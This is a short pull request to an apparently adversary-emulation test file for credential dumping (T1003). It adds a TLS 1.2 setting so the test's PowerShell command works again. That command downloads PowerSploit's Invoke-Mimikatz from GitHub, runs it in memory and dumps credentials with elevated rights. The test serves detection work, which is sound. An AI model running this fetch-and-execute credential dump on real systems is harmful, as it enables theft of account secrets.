### PR TITLE
Fixed the PowerShell SSL error by setting to Tls12

### DIFF
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -17,6 +17,7 @@ atomic_tests:
       default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
   executor:
     command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
     name: powershell
     elevation_required: true


### PR DESCRIPTION
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 was added.

**Details:**
Mimikatz execution resulted in the error "The request was aborted: Could not create SSL/TLS secure Channel"
Therefore added [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 just prior to the invoke expression segment to resolve it. 

**Testing:**
Tested on the local InvokeAtomic deployment.

**Associated Issues:** 
N/A
